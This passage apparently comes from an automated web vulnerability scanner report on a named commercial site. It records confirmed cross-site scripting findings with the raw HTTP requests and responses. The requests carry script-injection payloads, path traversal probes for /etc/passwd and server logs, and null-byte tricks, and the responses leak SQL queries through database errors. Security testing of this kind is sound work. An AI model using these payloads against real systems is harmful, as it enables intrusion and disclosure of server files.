cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/proj' at line 5
- /ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E

/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0009C4)</script>

Request

GET /ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009C4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e7d54ngr10s80iap8kffl4rei3; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?'"--></style></script><script>alert(0x0009D1..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0009D1)</script>

Request

GET /ppc/leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hbbsnf6umun53i2n01aophbd43; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0009DD)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/cace00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009DD)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ddenv9f54698fpv98cdvgjt6r3; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


